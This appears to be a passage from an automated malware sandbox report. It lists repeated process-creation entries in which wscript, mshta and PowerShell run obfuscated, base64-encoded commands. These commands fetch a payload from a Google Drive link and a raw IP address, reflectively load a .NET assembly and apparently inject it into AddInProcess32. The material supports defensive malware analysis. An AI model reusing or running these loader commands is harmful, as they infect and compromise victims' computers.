W1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfqgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagiefezc1uwvbficagicagicagicagicagicagicagicagicagicagicattuvtqkvyzevgsu5pdglvtiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvybg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagumhqqvdhvsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagifpit0djvsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagiffvlhvpbnqgicagicagicagicagicagicagicagicagicagicagigxzagjqshrzleludfb0ciagicagicagicagicagicagicagicagicagicagicagaik7jyagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicjuawvliiagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcefjzsagicagicagicagicagicagicagicagicagicagicagcnb3wulprnnlecagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjfq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4xnzyumtqxlzm2l2dvb2r0agluz3n3axroz3jlyxrjb21lymfja3dpdghncmvhdhroawducy50suyilcikru5wokfquerbvefcz29vzhroaw5nc3dpdghncmvhdgnvbwviywnrd2l0agdyzwf0dghpzy52ylmildasmck7c1rhunqtc2xlzvaomyk7u3rhcnqgicagicagicagicagicagicagicagicagicagicagicikzu52okfquerbvefcz29vzhroaw5nc3dpdghncmvhdgnvbwviywnrd2l0agdyzwf0dghpzy52ylmi'+[char]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnvunraw1hz2vvcmwgpsawverodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2enkydkjysnjmlkptfbsvznskpkdjfgnnztnhnvt3libkgtc0r2vwhcwxd1ciawveq7vunrd2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0llcnkydlyknsawvuddtvq1fpbwfnzuj5dgvzid0gvunrd2viq2xpzw50lkrvd25sb2fkrgf0yshvq1fpbscrj2fnzvvybck7vunraw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcnkycovunraw1hz2vcexrlcyk7vunrc3rhcnrgbgfnid0gmfrepdxcqvnfnjrfu1rbulq+pjburdtvq1enkydlbmrgbgfnid0gmfrepdxcqvnfnjrfru5epj4wveq7vunrc3rhcnrjbmrleca9ifvduwltywdlvgv4dc5jbmrlee9mkfvduxn0yxj0rmxhzyk7vunrzw5ksw5kzxggpsbvq1fpbwfnzvrlehqusw5kzxhpzihvq1flbmrgbgfnkttvq1fzdccrj2fydeluzgv4ic1nzsawic1hbmqgvunrzw5ksw5kzxgglwd0ifvduxn0yxj0sw5kzxg7vunrc3rhcnrjbmrlecarpsbvq1fzdgfydezsywcutgvuz3roo1vduwjhc2u2nccrj0xlbmd0aca9iccrj1vdjysnuscrj2vuzeluzgv4ic0gvunrc3rhcnrjbmrledtvq1fiyxnlnjrdb21tyw5kiccrjz0gvunraw1hz2vuzxh0lln1ynn0cmluzyhvq1fzdgfydeluzgv4lcbvq1fiyxnlnjrmzw5ndggpo1vduwjhc2u2nfjldmvyc2vkid0glwpvaw4gkfvduwjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbqexogrm9yrwfjac1pymply3qgeybvq1ffih0pwycrjy0xli4tkfvduwjhc2u2nenvbw1hbmqutgvuz3rokv07vunry29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhvq1fiyxnlnjrszxzlcnnlzck7vunrbg9hzgvkqxnzjysnzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkfvduwnvbw1hbmrcexrlcyk7vumnkydrdmfptwv0ag9kid0gw2rubglilklplkhvbscrj2vdlkdlde1ldghvzcgwverwqukwveqpo1vduxzhau1ldghvzc5jbnzva2uojysnvunrjysnbnvsbcwgqcgwver0ehqusutptdayjvnht0wvnjmvmtqxljynkyc3ms4zlji5ms8vonb0dggwveqsidburgrlc2f0axzhzg8wveqsidburgrlc2f0axzhzg8wveqsidburgrlc2f0ascrj3zhzg8wveqsidburefkzeluuhjvy2vzczmymfrelcawverkzxnhdgl2ywrvmfrelcawverkzxnhdgl2ywrvmfreldburgrlc2f0axzhzg8wveqsmfrezgvzyxrpdmfkbzburcwnkycwverkzxnhdgl2ywrvjysnmfreldburgrlc2f0axzhzg8wveqsmfrezgvzyxrpdmfkbzburcwwvccrj0qxmfreldburgrlc2f0axzhzccrj28wveqpkscrjzsnks1yrxbsywnfj1vduscsw2niyvjdmzygic1yrxbsywnfjzburccsw2niyvjdmzkgic1yrxbsywnfichby0hhul04mctby0hhul0xmjerw2niyvjdmtiyksxby0hhul0xmjqpihwuicgor0vulxzhuklhqkxliccqbwrykicplm5htuvbmywxmswyxs1kb0lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('ucqimageurl = 0tdhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur 0td;ucqwebclient = new-object system.net.w'+'ebclient;ucqimagebytes = ucqwebclient.downloaddata(ucqim'+'ageurl);ucqimagetext = [system.text.encoding]::utf8.getstring'+'(ucqimagebytes);ucqstartflag = 0td<<base64_start>>0td;ucq'+'endflag = 0td<<base64_end>>0td;ucqstartindex = ucqimagetext.indexof(ucqstartflag);ucqendindex = ucqimagetext.indexof(ucqendflag);ucqst'+'artindex -ge 0 -and ucqendindex -gt ucqstartindex;ucqstartindex += ucqstartflag.length;ucqbase64'+'length = '+'uc'+'q'+'endindex - ucqstartindex;ucqbase64command '+'= ucqimagetext.substring(ucqstartindex, ucqbase64length);ucqbase64reversed = -join (ucqbase64command.tochararray() pyz foreach-object { ucq_ })['+'-1..-(ucqbase64command.length)];ucqcommandbytes = [system.convert]::frombase64string(ucqbase64reversed);ucqloadedass'+'embly = [system.reflection.assembly]::load(ucqcommandbytes);uc'+'qvaimethod = [dnlib.io.hom'+'e].getmethod(0tdvai0td);ucqvaimethod.invoke('+'ucq'+'null, @(0tdtxt.ikol02%sgol/63/141.6'+'71.3.291//:ptth0td, 0tddesativado0td, 0tddesativado0td, 0tddesati'+'vado0td, 0tdaddinprocess320td, 0tddesativado0td, 0tddesativado0td,0tddesativado0td,0tddesativado0td,'+'0tddesativado'+'0td,0tddesativado0td,0tddesativado0td,0t'+'d10td,0tddesativad'+'o0td))'+';')-replace'ucq',[char]36 -replace'0td',[char]39 -replace ([char]80+[char]121+[char]122),[char]124) |. ((get-variable '*mdr*').name[3,11,2]-join'')"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfqgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagiefezc1uwvbficagicagicagicagicagicagicagicagicagicagicattuvtqkvyzevgsu5pdglvtiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvybg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagumhqqvdhvsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagifpit0djvsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagiffvlhvpbnqgicagicagicagicagicagicagicagicagicagicagigxzagjqshrzleludfb0ciagicagicagicagicagicagicagicagicagicagicagaik7jyagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicjuawvliiagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcefjzsagicagicagicagicagicagicagicagicagicagicagcnb3wulprnnlecagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjfq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4xnzyumtqxlzm2l2dvb2r0agluz3n3axroz3jlyxrjb21lymfja3dpdghncmvhdhroawducy50suyilcikru5wokfquerbvefcz29vzhroaw5nc3dpdghncmvhdgnvbwviywnrd2l0agdyzwf0dghpzy52ylmildasmck7c1rhunqtc2xlzvaomyk7u3rhcnqgicagicagicagicagicagicagicagicagicagicagicikzu52okfquerbvefcz29vzhroaw5nc3dpdghncmvhdgnvbwviywnrd2l0agdyzwf0dghpzy52ylmi'+[char]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnvunraw1hz2vvcmwgpsawverodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2enkydkjysnjmlkptfbsvznskpkdjfgnnztnhnvt3libkgtc0r2vwhcwxd1ciawveq7vunrd2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0llcnkydlyknsawvuddtvq1fpbwfnzuj5dgvzid0gvunrd2viq2xpzw50lkrvd25sb2fkrgf0yshvq1fpbscrj2fnzvvybck7vunraw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcnkycovunraw1hz2vcexrlcyk7vunrc3rhcnrgbgfnid0gmfrepdxcqvnfnjrfu1rbulq+pjburdtvq1enkydlbmrgbgfnid0gmfrepdxcqvnfnjrfru5epj4wveq7vunrc3rhcnrjbmrleca9ifvduwltywdlvgv4dc5jbmrlee9mkfvduxn0yxj0rmxhzyk7vunrzw5ksw5kzxggpsbvq1fpbwfnzvrlehqusw5kzxhpzihvq1flbmrgbgfnkttvq1fzdccrj2fydeluzgv4ic1nzsawic1hbmqgvunrzw5ksw5kzxgglwd0ifvduxn0yxj0sw5kzxg7vunrc3rhcnrjbmrlecarpsbvq1fzdgfydezsywcutgvuz3roo1vduwjhc2u2nccrj0xlbmd0aca9iccrj1vdjysnuscrj2vuzeluzgv4ic0gvunrc3rhcnrjbmrledtvq1fiyxnlnjrdb21tyw5kiccrjz0gvunraw1hz2vuzxh0lln1ynn0cmluzyhvq1fzdgfydeluzgv4lcbvq1fiyxnlnjrmzw5ndggpo1vduwjhc2u2nfjldmvyc2vkid0glwpvaw4gkfvduwjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbqexogrm9yrwfjac1pymply3qgeybvq1ffih0pwycrjy0xli4tkfvduwjhc2u2nenvbw1hbmqutgvuz3rokv07vunry29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhvq1fiyxnlnjrszxzlcnnlzck7vunrbg9hzgvkqxnzjysnzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkfvduwnvbw1hbmrcexrlcyk7vumnkydrdmfptwv0ag9kid0gw2rubglilklplkhvbscrj2vdlkdlde1ldghvzcgwverwqukwveqpo1vduxzhau1ldghvzc5jbnzva2uojysnvunrjysnbnvsbcwgqcgwver0ehqusutptdayjvnht0wvnjmvmtqxljynkyc3ms4zlji5ms8vonb0dggwveqsidburgrlc2f0axzhzg8wveqsidburgrlc2f0axzhzg8wveqsidburgrlc2f0ascrj3zhzg8wveqsidburefkzeluuhjvy2vzczmymfrelcawverkzxnhdgl2ywrvmfrelcawverkzxnhdgl2ywrvmfreldburgrlc2f0axzhzg8wveqsmfrezgvzyxrpdmfkbzburcwnkycwverkzxnhdgl2ywrvjysnmfreldburgrlc2f0axzhzg8wveqsmfrezgvzyxrpdmfkbzburcwwvccrj0qxmfreldburgrlc2f0axzhzccrj28wveqpkscrjzsnks1yrxbsywnfj1vduscsw2niyvjdmzygic1yrxbsywnfjzburccsw2niyvjdmzkgic1yrxbsywnfichby0hhul04mctby0hhul0xmjerw2niyvjdmtiyksxby0hhul0xmjqpihwuicgor0vulxzhuklhqkxliccqbwrykicplm5htuvbmywxmswyxs1kb0lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('ucqimageurl = 0tdhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur 0td;ucqwebclient = new-object system.net.w'+'ebclient;ucqimagebytes = ucqwebclient.downloaddata(ucqim'+'ageurl);ucqimagetext = [system.text.encoding]::utf8.getstring'+'(ucqimagebytes);ucqstartflag = 0td<<base64_start>>0td;ucq'+'endflag = 0td<<base64_end>>0td;ucqstartindex = ucqimagetext.indexof(ucqstartflag);ucqendindex = ucqimagetext.indexof(ucqendflag);ucqst'+'artindex -ge 0 -and ucqendindex -gt ucqstartindex;ucqstartindex += ucqstartflag.length;ucqbase64'+'length = '+'uc'+'q'+'endindex - ucqstartindex;ucqbase64command '+'= ucqimagetext.substring(ucqstartindex, ucqbase64length);ucqbase64reversed = -join (ucqbase64command.tochararray() pyz foreach-object { ucq_ })['+'-1..-(ucqbase64command.length)];ucqcommandbytes = [system.convert]::frombase64string(ucqbase64reversed);ucqloadedass'+'embly = [system.reflection.assembly]::load(ucqcommandbytes);uc'+'qvaimethod = [dnlib.io.hom'+'e].getmethod(0tdvai0td);ucqvaimethod.invoke('+'ucq'+'null, @(0tdtxt.ikol02%sgol/63/141.6'+'71.3.291//:ptth0td, 0tddesativado0td, 0tddesativado0td, 0tddesati'+'vado0td, 0tdaddinprocess320td, 0tddesativado0td, 0tddesativado0td,0tddesativado0td,0tddesativado0td,'+'0tddesativado'+'0td,0tddesativado0td,0tddesativado0td,0t'+'d10td,0tddesativad'+'o0td))'+';')-replace'ucq',[char]36 -replace'0td',[char]39 -replace ([char]80+[char]121+[char]122),[char]124) |. ((get-variable '*mdr*').name[3,11,2]-join'')"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfqgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagiefezc1uwvbficagicagicagicagicagicagicagicagicagicagicattuvtqkvyzevgsu5pdglvtiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvybg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagumhqqvdhvsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagifpit0djvsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagiffvlhvpbnqgicagicagicagicagicagicagicagicagicagicagigxzagjqshrzleludfb0ciagicagicagicagicagicagicagicagicagicagicagaik7jyagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicjuawvliiagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcefjzsagicagicagicagicagicagicagicagicagicagicagcnb3wulprnnlecagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjfq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4xnzyumtqxlzm2l2dvb2r0agluz3n3axroz3jlyxrjb21lymfja3dpdghncmvhdhroawducy50suyilcikru5wokfquerbvefcz29vzhroaw5nc3dpdghncmvhdgnvbwviywnrd2l0agdyzwf0dghpzy52ylmildasmck7c1rhunqtc2xlzvaomyk7u3rhcnqgicagicagicagicagicagicagicagicagicagicagicikzu52okfquerbvefcz29vzhroaw5nc3dpdghncmvhdgnvbwviywnrd2l0agdyzwf0dghpzy52ylmi'+[char]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnvunraw1hz2vvcmwgpsawverodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2enkydkjysnjmlkptfbsvznskpkdjfgnnztnhnvt3libkgtc0r2vwhcwxd1ciawveq7vunrd2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0llcnkydlyknsawvuddtvq1fpbwfnzuj5dgvzid0gvunrd2viq2xpzw50lkrvd25sb2fkrgf0yshvq1fpbscrj2fnzvvybck7vunraw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcnkycovunraw1hz2vcexrlcyk7vunrc3rhcnrgbgfnid0gmfrepdxcqvnfnjrfu1rbulq+pjburdtvq1enkydlbmrgbgfnid0gmfrepdxcqvnfnjrfru5epj4wveq7vunrc3rhcnrjbmrleca9ifvduwltywdlvgv4dc5jbmrlee9mkfvduxn0yxj0rmxhzyk7vunrzw5ksw5kzxggpsbvq1fpbwfnzvrlehqusw5kzxhpzihvq1flbmrgbgfnkttvq1fzdccrj2fydeluzgv4ic1nzsawic1hbmqgvunrzw5ksw5kzxgglwd0ifvduxn0yxj0sw5kzxg7vunrc3rhcnrjbmrlecarpsbvq1fzdgfydezsywcutgvuz3roo1vduwjhc2u2nccrj0xlbmd0aca9iccrj1vdjysnuscrj2vuzeluzgv4ic0gvunrc3rhcnrjbmrledtvq1fiyxnlnjrdb21tyw5kiccrjz0gvunraw1hz2vuzxh0lln1ynn0cmluzyhvq1fzdgfydeluzgv4lcbvq1fiyxnlnjrmzw5ndggpo1vduwjhc2u2nfjldmvyc2vkid0glwpvaw4gkfvduwjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbqexogrm9yrwfjac1pymply3qgeybvq1ffih0pwycrjy0xli4tkfvduwjhc2u2nenvbw1hbmqutgvuz3rokv07vunry29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhvq1fiyxnlnjrszxzlcnnlzck7vunrbg9hzgvkqxnzjysnzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkfvduwnvbw1hbmrcexrlcyk7vumnkydrdmfptwv0ag9kid0gw2rubglilklplkhvbscrj2vdlkdlde1ldghvzcgwverwqukwveqpo1vduxzhau1ldghvzc5jbnzva2uojysnvunrjysnbnvsbcwgqcgwver0ehqusutptdayjvnht0wvnjmvmtqxljynkyc3ms4zlji5ms8vonb0dggwveqsidburgrlc2f0axzhzg8wveqsidburgrlc2f0axzhzg8wveqsidburgrlc2f0ascrj3zhzg8wveqsidburefkzeluuhjvy2vzczmymfrelcawverkzxnhdgl2ywrvmfrelcawverkzxnhdgl2ywrvmfreldburgrlc2f0axzhzg8wveqsmfrezgvzyxrpdmfkbzburcwnkycwverkzxnhdgl2ywrvjysnmfreldburgrlc2f0axzhzg8wveqsmfrezgvzyxrpdmfkbzburcwwvccrj0qxmfreldburgrlc2f0axzhzccrj28wveqpkscrjzsnks1yrxbsywnfj1vduscsw2niyvjdmzygic1yrxbsywnfjzburccsw2niyvjdmzkgic1yrxbsywnfichby0hhul04mctby0hhul0xmjerw2niyvjdmtiyksxby0hhul0xmjqpihwuicgor0vulxzhuklhqkxliccqbwrykicplm5htuvbmywxmswyxs1kb0lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('ucqimageurl = 0tdhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur 0td;ucqwebclient = new-object system.net.w'+'ebclient;ucqimagebytes = ucqwebclient.downloaddata(ucqim'+'ageurl);ucqimagetext = [system.text.encoding]::utf8.getstring'+'(ucqimagebytes);ucqstartflag = 0td<<base64_start>>0td;ucq'+'endflag = 0td<<base64_end>>0td;ucqstartindex = ucqimagetext.indexof(ucqstartflag);ucqendindex = ucqimagetext.indexof(ucqendflag);ucqst'+'artindex -ge 0 -and ucqendindex -gt ucqstartindex;ucqstartindex += ucqstartflag.length;ucqbase64'+'length = '+'uc'+'q'+'endindex - ucqstartindex;ucqbase64command '+'= ucqimagetext.substring(ucqstartindex, ucqbase64length);ucqbase64reversed = -join (ucqbase64command.tochararray() pyz foreach-object { ucq_ })['+'-1..-(ucqbase64command.length)];ucqcommandbytes = [system.convert]::frombase64string(ucqbase64reversed);ucqloadedass'+'embly = [system.reflection.assembly]::load(ucqcommandbytes);uc'+'qvaimethod = [dnlib.io.hom'+'e].getmethod(0tdvai0td);ucqvaimethod.invoke('+'ucq'+'null, @(0tdtxt.ikol02%sgol/63/141.6'+'71.3.291//:ptth0td, 0tddesativado0td, 0tddesativado0td, 0tddesati'+'vado0td, 0tdaddinprocess320td, 0tddesativado0td, 0tddesativado0td,0tddesativado0td,0tddesativado0td,'+'0tddesativado'+'0td,0tddesativado0td,0tddesativado0td,0t'+'d10td,0tddesativad'+'o0td))'+';')-replace'ucq',[char]36 -replace'0td',[char]39 -replace ([char]80+[char]121+[char]122),[char]124) |. ((get-variable '*mdr*').name[3,11,2]-join'')"Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfqgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagiefezc1uwvbficagicagicagicagicagicagicagicagicagicagicattuvtqkvyzevgsu5pdglvtiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvybg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagumhqqvdhvsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagifpit0djvsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagiffvlhvpbnqgicagicagicagicagicagicagicagicagicagicagigxzagjqshrzleludfb0ciagicagicagicagicagicagicagicagicagicagicagaik7jyagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicjuawvliiagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcefjzsagicagicagicagicagicagicagicagicagicagicagcnb3wulprnnlecagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjfq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4xnzyumtqxlzm2l2dvb2r0agluz3n3axroz3jlyxrjb21lymfj